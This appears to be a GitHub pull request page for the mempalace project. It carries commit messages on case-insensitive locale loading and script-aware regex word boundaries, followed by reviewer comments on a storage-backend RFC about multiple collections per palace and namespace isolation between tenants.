BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the
locale files mix conventions (pt-br.json vs zh-CN.json). On
case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently
missed the file, _load_entity_section returned {}, and entity
detection ran in English with no warning.

The cache key in get_entity_patterns was built from raw input, so
('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk
filename stem via lowercase comparison, and route load_lang,
_load_entity_section, and the cache key through it.

Closes #927

* fix(i18n): use Optional[str] for Python 3.9 compatibility

PEP 604 union syntax (str | None) requires Python 3.10+. The project
supports 3.9 per CI matrix, so use typing.Optional instead.

* fix(entity_detector): script-aware word boundaries for combining-mark scripts

Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras)
like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w.
This means \b splits mid-word on every matra: names like अनीता (Anita)
truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b
never match because \b fails after the final matra of कहा.

Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script
whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field
in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n
loader replaces every \b in that locale's patterns with a script-aware
lookaround that treats the declared characters as "inside-word", and
pre-wraps candidate/multi_word patterns with the same boundary.

Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru,
it are unchanged.
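
The \b rewrite can be sketched as follows; `script_aware_boundary` is a hypothetical name for illustration:

```python
import re

def script_aware_boundary(pattern: str, boundary_chars: str) -> str:
    """Replace every \\b with a lookaround pair that treats the
    declared characters as inside-word. Caveat for the sketch: a
    \\b inside a character class (where it means backspace) would
    also be replaced; a real loader must special-case that."""
    cls = boundary_chars
    boundary = (
        rf"(?:(?<![{cls}])(?=[{cls}])"   # word start
        rf"|(?<=[{cls}])(?![{cls}]))"    # word end
    )
    return pattern.replace(r"\b", boundary)

# \w plus the full Devanagari block, so matras count as inside-word
# and names like अनीता match whole.
HINDI_BOUNDARY = r"\w\u0900-\u097F"
```

With this, `script_aware_boundary(r"\bकहा\b", HINDI_BOUNDARY)` matches कहा in running Hindi text even though standard \b fails after the final matra.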

Changes:
- mempalace/i18n/__init__…

@jphein (Collaborator) left a comment

Follow-up review after the 2026-04-13 round + @bensig's approval. Most of my earlier concerns are addressed; one new empirical observation worth flagging.

Closed from my prior review

  • §1.5 read-heavy edge case (palace stays unknown indefinitely if it rarely writes) — closed by the explicit mempalace palace set-embedder --model NAME CLI in the three-state table at line 192. Operators of read-heavy palaces have a path that doesn't require waiting for a stale write to trigger identity resolution. ✓

  • §7.4 UUID5 namespace — bensig's block is still mechanical (placeholder TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME); no opinion from this side on the value, just confirming it's the only remaining gate.

Still open from my prior review (no new info needed, just a note)

  • §1.3 typed-results migration — RFC currently doesn't sketch a .to_dict() compat shim on QueryResult / GetResult. Forks and downstream consumers with code touching mcp_server.py or searcher.py that assume dict returns will need real edits, not no-op wrappers. The cleanup PR mentioned in §10 is the right place to land it; just naming the question now so it isn't a surprise during that PR's review.

New: per-palace multi-collection isn't in the spec

The fork shipped a structural fix this week that's adjacent to RFC 001 in an interesting way. Cat 9 A/B benchmark on a 151K-drawer canonical palace surfaced that Stop-hook auto-save checkpoints (short, query-term-saturated) dominate vector top-N — kind=all returned 632 tokens/Q of mostly-checkpoint word-soup; kind=content (post-filter) returned just 3 tokens/Q because over-fetch=100 wasn't enough. Recall was 0.984 R@5; E2E quality collapsed.

The fix promoted the architecture from "filter at query time" to "split at storage time": move checkpoints to a dedicated mempalace_session_recovery ChromaDB collection (same client, same palace, separate index), with a new mempalace_session_recovery_read MCP tool reading by session_id / agent / since-until. Implementation: palace.py gained _SESSION_RECOVERY_COLLECTION + get_session_recovery_collection(palace_path) mirroring get_collection(palace_path, collection_name="mempalace_drawers", create=...). Palace-daemon's lifespan runs migrate_checkpoints_to_recovery() on startup so existing palaces auto-migrate.

This works on the current BaseBackend / BaseCollection API — get_collection(palace, collection_name=...) is already keyed by collection_name, so adding a sibling collection per palace is just calling it with a different name. The design fell out of the existing seam.

Question for the spec: is "multiple collections per palace, by purpose" intentionally implicit in the API, or worth one sentence in §2.5 / §3.1? Reading the RFC, "palace" feels like the unit (1:1 with a collection); but production needed >1 collection per palace for the verbatim-vs-derivative split. Backends like Postgres (#665) and Qdrant (#700) handle this trivially via schema/collection naming, but a future backend that assumes 1:1 — or a backend author reading the spec — might design themselves into a corner. A "backends MUST support N collections per palace, keyed by collection_name arg" line would close the gap without changing any signatures.

(Spec at §1.6 calls out "many palaces" but not "many collections per palace." Adjacent but distinct.)
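
The "N collections per palace, keyed by collection_name" behavior the existing seam already allows can be sketched with a minimal stand-in (all names illustrative, not from the RFC):

```python
class FakeBackend:
    """Toy backend: collections keyed by (palace, name), mirroring
    how get_collection(palace, collection_name=...) already permits
    sibling collections within one palace."""
    def __init__(self):
        self._collections = {}

    def get_collection(self, palace, collection_name, create=False):
        key = (palace, collection_name)
        if key not in self._collections and create:
            self._collections[key] = []
        return self._collections.get(key)

backend = FakeBackend()
drawers = backend.get_collection("my-palace", "mempalace_drawers", create=True)
recovery = backend.get_collection("my-palace", "mempalace_session_recovery", create=True)
assert drawers is not recovery  # same palace, separate indexes
```

A one-line MUST clause in the spec would simply pin this behavior so no backend author collapses the (palace, collection_name) key into palace alone.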

Rest of the spec

Read clean. §10's flagging of mcp_server._get_client() cache + reconnect for migration-into-ChromaBackend is exactly right — that #757 work is Chroma-specific and shouldn't live in mcp_server. §11's PR-impact table accurately reflects the in-flight backends; nothing missing from this side.

Net: ready to merge after UUID5 and (if desired) the multi-collection sentence.

@cschnatz

Following up on Q1 from my 2026-04-15 comment — re-stating concretely now that approval is close, since this is the one item I'd like pinned in the spec rather than left to implementations.

We treat PalaceRef.namespace as a mandatory isolation boundary at the contract level. A backend that accepts a write under PalaceRef(namespace="tenant_A") and later returns those records for a read under PalaceRef(namespace="tenant_B") is, for us, a critical defect — not a caller misconfiguration. Auth/authz (which team_ids a sidecar may query) stays on the deployment side. But cross-namespace bleed within a single backend instance has to be a spec violation, not implementation choice.

§4.4 currently reads as naming-only ("the backend uses it as given"). Suggest one MUST clause:

Backends MUST scope all reads, writes, and deletes by PalaceRef.namespace. A record written under one namespace MUST NOT be returned, modified, or deleted by an operation issued under a different namespace within the same backend instance. Cross-namespace access is a spec violation.

Without this, hosted multi-tenant deployments can't cite RFC 001 as the basis for tenant isolation, and the contract becomes unenforceable across plugins from different authors.
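
The proposed clause is directly testable. A toy in-memory backend illustrating the required scoping (names and signatures hypothetical, not from the RFC):

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class PalaceRef:
    id: str
    namespace: Optional[str] = None

class InMemoryBackend:
    """Toy backend that scopes every operation by (namespace, palace
    id), satisfying the proposed MUST clause."""
    def __init__(self):
        self._store = {}

    def _key(self, ref: PalaceRef):
        return (ref.namespace, ref.id)

    def add(self, ref, ids, documents):
        bucket = self._store.setdefault(self._key(ref), {})
        bucket.update(zip(ids, documents))

    def get(self, ref, ids):
        bucket = self._store.get(self._key(ref), {})
        return [bucket[i] for i in ids if i in bucket]

backend = InMemoryBackend()
ref_a = PalaceRef(id="p1", namespace="tenant_A")
ref_b = PalaceRef(id="p1", namespace="tenant_B")  # same palace id!
backend.add(ref_a, ids=["d1"], documents=["secret for A"])
# A record written under tenant_A MUST NOT surface under tenant_B:
assert backend.get(ref_b, ids=["d1"]) == []
assert backend.get(ref_a, ids=["d1"]) == ["secret for A"]
```

The same shape would drop naturally into the AbstractBackendContractSuite, making cross-namespace bleed a conformance failure rather than an implementation choice.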

Labels

- area/install (pip/uv/pipx/plugin install and packaging)
- documentation (Improvements or additions to documentation)
- storage
